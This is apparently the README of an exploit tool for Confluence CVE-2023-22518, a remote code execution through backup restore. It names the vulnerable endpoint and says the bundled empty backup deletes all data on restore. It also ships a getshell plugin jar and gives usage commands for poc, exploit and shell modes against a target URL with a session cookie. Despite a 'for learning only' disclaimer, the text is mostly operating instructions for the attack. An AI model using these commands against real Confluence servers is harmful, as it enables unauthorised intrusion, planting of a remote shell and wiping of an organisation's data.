
Confluence CVE-2023-22518
Exploit für Confluence CVE-2023-22518 (Backup-Wiederherstellungs-RCE)
POST /setup/setup-restore.action
Erfordert gültige Anmeldung und Admin-Rechte (oder einen Authentifizierungs-Bypass)
xmlexport-20231127-071916-1.zip – leeres Confluence-Backup. Das Wiederherstellen wird ALLE Daten LÖSCHEN!!! Durch ein beliebiges Backup ersetzen; im selben Ordner wie das Skript behalten.shellplug.jar – getshell-Plugin, entnommen von CVE-2023-22515_RCE.python .\CVE-2023-22518.py -h
██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██████╗ ███████╗ ██╗ █████╗
██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗╚════██╗ ╚════██╗╚════██╗██╔════╝███║██╔══██╗
██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗ █████╔╝ █████╔╝███████╗╚██║╚█████╔╝
██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚═══██╗╚════╝██╔═══╝ ██╔═══╝ ╚════██║ ██║██╔══██╗
╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗██████╔╝ ███████╗███████╗███████║ ██║╚█████╔╝
╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝╚═════╝ ╚══════╝╚══════╝╚══════╝ ╚═╝ ╚════╝
@Auth: C1ph3rX13
@Blog: https://c1ph3rx13.github.io
@Note: 代码仅供学习使用,请勿用于其他用途
optional arguments:
-h, --help show this help message and exit
-t TARGET, --target TARGET
Target Url
-id JSESSIONID, --jsessionid JSESSIONID
JSESSIONID
--timeout TIMEOUT Timeout (Default: 30 Seconds)
--proxy PROXY Proxy
python .\CVE-2023-22518.py poc -t http://IP:Port

Cookie:
JSESSIONID=754BEE347CD53ECB342B74CFFDD33B4D
python .\CVE-2023-22518.py exp -t http://IP:Port -id 754BEE347CD53ECB342B74CFFDD33B4D

Cookie:
JSESSIONID=754BEE347CD53ECB342B74CFFDD33B4D
python .\CVE-2023-22518.py shell -t http://IP:Port -id 754BEE347CD53ECB342B74CFFDD33B4D
